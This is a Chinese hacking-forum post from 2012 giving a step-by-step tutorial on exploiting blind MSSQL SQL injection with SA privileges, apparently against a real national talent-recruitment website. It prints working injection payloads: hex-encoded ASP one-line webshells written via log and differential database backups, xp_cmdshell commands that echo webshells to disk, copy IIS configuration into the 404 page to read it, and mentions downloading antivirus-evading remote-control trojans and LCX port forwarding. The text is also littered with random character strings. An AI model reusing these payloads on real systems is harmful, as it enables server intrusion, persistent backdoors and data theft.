找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2113|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————; W/ X( q8 ~' {* g8 ]
8 q. x9 s: C5 |# v" P

3 ?8 q" ~1 a, a                                                             欢迎高手访问指导,欢迎新手朋友交流学习。. C$ r' F8 q& n! G  r

* Z# t. Q; x# u2 r' F# ~                                                                 
0 }$ E  u6 F* k7 C: _6 W0 c/ w, t                                                                 4 }' F; l$ m" o! L
                                                                  论坛: http://www.90team.net/4 s8 c8 n, S7 {/ a5 P: [; g2 F

9 M, O$ p* f* r6 N, ]/ r
3 s& D* {1 h/ K! i
$ e5 K2 w4 u% c8 F4 ]友情检测国家人才网8 T3 ]. m- ?/ h- l9 ]
! V$ C& N5 P3 {( V

# T2 i& J" B5 _2 Y% Y内容:MSSQL注入SA权限不显错模式下的入侵
7 `+ M0 P7 @+ t. s7 ?9 x/ n; `, ~7 i: }, J1 G( l

% D+ y1 a! i: Y' a" d. ^一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
5 G3 Z" D5 C& e3 s4 J) a4 ^; Z1 ?; k4 u
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。8 j' [( A0 M9 `; `0 ]4 i
! ]' c  L/ m2 d& H& Y/ ^5 I
# T! n- V" Z1 U! o$ V$ p9 T
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
$ l. t! g) W7 t$ o$ h9 q3 d) f$ `6 K9 n
思路:* D3 M+ d$ Y5 m* g4 {+ g

9 v3 h, }* k: i& n6 [  i首先:9 R: G8 c2 W; T) Q6 o+ g0 ~1 F; \5 `

; [/ V% _% r! s2 g+ ^6 R5 Q( I  m通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
! k* F0 Q: o% Y  ^' j  t7 y& }0 j; W0 F7 x; _  h- {8 A* B4 h
1.日志备份获得Webshell
& ?, K$ k, \$ g: i& H7 O" V
; ^: s, c& R. q/ m# ~2 `5 z. h2.数据库差异备份获得Webshell/ {7 U* V1 q+ a

" Y5 G2 Y3 E! Y6 F4.直接下载免杀远控木马。
' @, R5 r9 Z2 j7 k6 H7 w' u5 Z4 X& a
$ a$ x. o9 g1 L  p* Q: v5.直接下载LCX将服务器端口转发出来
0 W% H7 l7 Y" D- u. q) h, e7 C6 S- \2 b0 T2 u4 k+ U* h6 S
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
% g3 w1 H0 e9 H# E: b1 a) v' X: \: b4 R$ F
& c' m% R) C5 ^! X2 Z1 n

" b0 @) f& ^: c$ ]在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
' D# I' u' r! }" y
# V# i2 m& |& z; g  w2 |7 O我直接演示后面一个方法
/ |" A5 x& i# g6 T4 y- W+ _, ~
5 I: O& e5 c4 L( z& ^! c) ]' o! t3 ^5 O+ r! C% d: g/ J3 |
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL % t4 b) G* {1 T9 x) R8 T' S

) Y, G2 H6 o4 ~/ j6 K  z! |% q4 G: W3 ^

' H7 q1 K! w1 c3 G6 Y% c2 p
* w& U1 H  A# N2 u% O◆日志备份:  N+ I4 q5 _1 _! x& E' _) w+ ^3 R

" n  B0 y; l' r$ y2 f
2 a, o6 E: @! V& l. _1. 进行初始备份
  _( J! z) R5 ~; S0 I; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--, j$ |3 {: }9 P1 ]# |  H* k

* W7 w. w) |: n: {/ h' h& y2. 插入数据/ Y- w+ }* p8 ~$ X! n/ g+ K( ^
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
! i: f4 e6 g5 X* v4 |0 S* T7 p
* f3 X! g; c$ F. J6 S0 A/ E5 n4 Q0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>& w) P( u. \( C/ a9 H) s8 N) ~/ O  o
  
* G0 y3 W- l; N& d4 E. `+ A$ z3. 备份并获得文件,删除临时表  W3 D3 g; i  B* }' Q6 M+ O
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
6 z' m9 a' U3 g; P
0 R# F5 \5 H6 t
3 D* v( Y0 f6 Y  V& D- r7 z: Y( }0 _8 \2 b+ I+ p
◆数据库差异备份* ], C6 O; b1 e1 Z4 G7 ?" x% @
- J/ C  J, D- z- Q7 b% K1 k1 |! }4 m
(1. 进行差异备份准备工作
% B* s! \) t6 {* I& B0 n7 C. }1 N+ w& z; o6 J; D
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--7 Z! ?+ J- d( n: K1 M
" ^( G. r9 i+ T' \. X) j
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码. H+ f' |3 z8 P& _! ?9 ~0 Q
9 E0 {! e, _9 D8 W, E) J3 ]7 y

1 z! v' L- B! p: [(2. 将数据写入到数据库* [2 F2 G& D2 N  n6 A: C
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
$ n/ w7 Q" W+ I% }; I/ G" S8 k
) \6 I( `1 v5 s: i$ C$ O1 M+ M0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
1 U: c8 ?9 B8 {- r: d& `! T# v
+ T0 F- J" u  `, N! \. B3. 备份数据库并清理临时文件
1 R% K8 S! F3 d7 ?. ^% I$ F' n# F6 N  q& E% t
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--$ y% L) m/ f* I0 j
3 G" \" z- m5 x8 p4 G
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
' m: _; H) c0 a2 q" M  z5 e+ P& A) n! j8 p) o

% d0 I: q5 O2 g' J3 `- P: r9 Q  I7 A$ u) ?. p  H2 x
用^转义字符来写ASP(一句话木马)文件的方法:   
$ y0 T# H2 N$ B% h, @5 f& v9 p/ e! l( ]
0 V/ t' l& u( v1 m1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--$ o5 @: I5 \5 g( e9 w& S# C1 E. |/ V
+ q7 G3 i$ I, m( ~1 B+ B
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
! F. \4 A5 Z+ ^, F& \* ^! {; x( K* w5 r' Q% I
读取IIS配置信息获取web路径" J4 F: s  F4 R0 n
1 ~4 @7 G3 @  g
     
; k5 U0 O% V3 o4 ^6 e( S% A# {     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
- @$ C  u6 k  f4 l8 f6 j9 @2 G0 Q& r; u" h" ?0 O  f
执行命令  V4 l. R. |/ v: ~+ F7 I6 Y3 s& I5 T
     
, c+ b# ~! h* o! U4 C     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--/ p3 a) k5 ~: E& T  Y9 j+ b1 ^

& b; e: ~1 P6 N: _+ C& Q
7 E. q8 s5 X) G& e! d9 x5 G& J3 ]4 M+ E. k% f0 A9 u- I# v3 c
& E6 {, H9 d4 j2 t6 ~& h
3 ^& V+ G" k8 e' M1 R1 ]

) C, f6 A* r, O. u# h" h# O0 A5 |* w' J
  Q  C0 B1 d0 B" w) M! F% u  n
! N' G4 O' n; A/ B% U; ~

( P6 o( k' `& m( `# J/ c2 V( e0 M5 R# j/ v8 O

' `$ I1 C* Y. W! q7 g2 m) N% {- V  i5 p' F
! N4 @1 X  U! A

$ R4 Z7 t( o6 q$ R: P0 G  ]
& g5 H6 Z: c3 A' j5 m( U) a
% q1 A, q1 U$ p0 S- A8 F3 _" O3 }% d" C/ J- G
* ]5 L9 N) K4 l' w
2 W" R8 m) ?( \+ S- j0 i
4 H4 i$ i# c- k6 ~$ J# \- Z! G, X
, [; N- ^4 x: j: U; n
. L0 P& s- n: Z

0 q% z; u0 M3 n( K! [4 x# B6 M3 O0 n

: C; A: z  L+ ]* b
& v4 @" M+ U0 m0 r. ?9 ~$ m
$ W5 Z- t3 b. Y, j& Y& d8 @$ K) V1 a6 d
; S/ g/ h! m3 F8 C9 c9 E1 k1 {; A4 Y- I
/ _  F8 {) n9 w6 _1 B! I1 ^
" ]* D8 }7 [; s6 T

) J" g9 ^9 y' h' ]6 _. w) F) X% j- Y. U8 b; w

' X) c5 `+ |, j. c+ N3 l9 o' T8 S& m1 x. \
, E- x- f  f* Q8 M# \$ R  a

/ N) v  s% q0 D6 ?/ n
  U0 L2 h/ v9 J% l% k8 e1 p( P, V( f' a8 O
# D6 e7 M0 T+ d7 F4 \

: }6 ]/ z+ w6 H) B1 ]5 a# z- {3 C* u+ q
5 \0 A. Z1 h( B) Y% G' [
6 G( n) y* a# l: T1 `1 v( ?) e

8 }) B  ]( V, `2 W1 }% t8 P; p: {8 w( I# R6 j+ t' g3 K8 f
4 f- c9 S: ^0 ~0 h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表